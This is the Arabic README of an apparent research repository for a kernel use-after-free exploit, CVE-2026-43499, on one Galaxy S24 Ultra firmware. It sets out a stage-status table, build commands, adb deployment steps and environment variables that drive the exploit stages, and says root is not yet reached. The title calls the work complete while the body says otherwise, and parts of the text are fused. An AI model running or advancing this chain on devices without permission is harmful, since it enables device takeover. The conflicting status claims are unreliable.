
منفذ بحث CVE-2026-43499 لهاتف Galaxy S24 Ultra SM-S928U1 DZF2 (مكتمل)
منفذ بحث خاص بالجهاز لثغرة CVE-2026-43499 لجهاز Samsung Galaxy S24 Ultra الأمريكي على البرنامج الثابت S928USQS6DZF2 (نطاق التطبيق / مسار الإنتاج).
هذا المستودع هو النسخة المكافئة لجهاز S24U من CVE-2026-43499-S25U. وهو يوثّق التقدّم الحالي غير المكتمل: تسليح مستوى التحكم و UAF للمكدس المتبقي في مكانهما؛ لكن كتابة بوابة نظيفة (hits>0) لم تتحقق بعد.
Model: SM-S928U1
Codename: e3q
Android: 14 / BP4A.251205.006 (display family)
Build / AP: S928U1UES6DZF2 / S928USQS6DZF2
Fingerprint: samsung/e3qsqw/e3q:14/UP1A.231005.007/S928USQS6DZF2:user/release-keys
Kernel: 6.1.145-android14-11-33419968-abS928USQS6DZF2
Architecture: arm64 / 4K pages
الإزاحات والتخطيطات تنطبق على هذا البرنامج الثابت فقط. لا تنقل الثوابت بين الإصدارات دون دليل.
| المرحلة | الحالة |
|---|---|
| تسريب mm عبر KernelSnitch / تجهيز الصفحة | يعمل على مسار الإنتاج |
| استرداد البنوك + MSG_PEEK (owner=1) | يعمل |
| تسليح UAF الكلاسيكي للمكدس المتبقي عبر EDEADLK | يعمل |
| زرع المكدس (nfds ≤ 320, residual base shift=2) | يعمل |
| مطابقة الخروج المبكر عند الأولوية 120 (وليس 139) | يعمل |
| هندسة الكتابة اللينة في ظل الخروج المبكر | زُرعت بأمان؛ بلا اجتياز |
REPLANT + اجتياز adjust_pi القسري عبر walk_nice | مثبت؛ يسبب KP دائمًا حتى الآن |
أوراكل البوابة hits>0 | مفتوح |
| القراءة/الكتابة الفيزيائية عبر الأنبوب / جذر Android / KernelSU | لم يتم الوصول إليه |
العائق: هندسة المتبقي الآمنة للاجتياز. زرع RB_EMPTY الحقيقي يتطلب عنوان VA نواة متبقٍ (APP_STAMP_RESIDUAL_ADDR / APP_STAMP_OVERLAY_BASE). الأشجار المزوّرة وتراكبات KEEP (التي تُصفَّر عند FD_ZERO) تسبب panic عند الاجتياز القسري. انظر docs/PROGRESS.md.
agent/s928u-bp4a-251205-006 (E3Q DZF2)رخصة Apache 2.0: LICENSE.
e3q-S928USQS6DZF2 (أوراكل P0 الفيزيائية، تخطيط البنوك، هندسة الأنبوب لـ DZF2).cve-2026-43499-app.so) مع slide_app.c: زرع الطوابع المتبقية، soft_match، اجتياز REPLANT، walk_nice، NO_PLANT، خطافات زرع EMPTY، فحص البنك، توصيل drain.O_APPEND (يتجنب إتلاف سجل العملية الأم/الابنة).export ANDROID_NDK_HOME=/path/to/ndk # e.g. r28 / API 34 clang
make -j$(nproc)
# or:
make app API=34
المخرجات:
build/e3q-S928USQS6DZF2/cve-2026-43499-app.so
build/e3q-S928USQS6DZF2/cve-2026-43499-root
build/e3q-S928USQS6DZF2/cve-2026-43499 # optional standalone
ADB على ويندوز (أو adb من جهاز المضيف) عبر المنفذ التسلسلي R5CXB20H9FD (مثال لوحدة بحثية):
# Prefer the rebuilt helper (O_APPEND logs), not only the APK copy.
adb push build/e3q-S928USQS6DZF2/cve-2026-43499-app.so /data/local/tmp/
adb push build/e3q-S928USQS6DZF2/cve-2026-43499-root /data/local/tmp/
adb shell "run-as dev.busung.s25uroot sh -c '
mkdir -p files/payload-overrides/e3q-S928USQS6DZF2
cp /data/local/tmp/cve-2026-43499-app.so \
files/payload-overrides/e3q-S928USQS6DZF2/
cp /data/local/tmp/cve-2026-43499-root files/
chmod 700 files/cve-2026-43499-root \
files/payload-overrides/e3q-S928USQS6DZF2/cve-2026-43499-app.so
'"
export APP_STACK_UAF_STAMP=1
export APP_STAMP_PLANT=soft
export APP_STAMP_SOFT_MATCH=1
export APP_STAMP_FIXED_SHIFT=2
export APP_BANK_VALID_ROOT=1
export APP_STAMP_STATUS_PATH=/data/user/0/dev.busung.s25uroot/files/stamp_status_last.txt
# run via helper --run-payload ... (see docs/PROGRESS.md)
# After soft_match plant: change residual prio then force task nice change.
export APP_STAMP_REPLANT_WALK=1
export APP_STAMP_WALK_PRIO=100
export APP_STAMP_WALK_NICE=18 # must differ from first nice (default 19)
# Prefer EMPTY bank for some paths; still KP without residual kVA EMPTY plant
لا تعِد فحص إزاحات الزرع 0–4؛ الأساس 2 مثبت.
| المستند | المحتوى |
|---|---|
| docs/PROGRESS.md | مصفوفة المعالم، ادعاءات OBS/SRC، نقطة التوقف |
| docs/ENV_REFERENCE.md |
استخدمه فقط على أجهزة تملكها أو لديك إذن صريح لاختبارها. هذه الشجرة البرمجية هي برمجيات بحثية لمسار هاتف إنتاجي مغلق؛ وهي ليست مثبّت جذر مكتمل أو مثبّت KernelSU.
تكامل KernelSU خارج النطاق إلى أن يتوفر مسار موثوق للكتابة عبر الأنبوب/الفيزيائية ومسار جذر. لا تتعامل مع هذا المستودع على أنه جاهز لـ KSU.
| متغيرات البيئة لمسارات الطوابع/البنوك |
| docs/RUN_HISTORY.md | سجل موجز لتشغيلات الجهاز (RUN047–062) |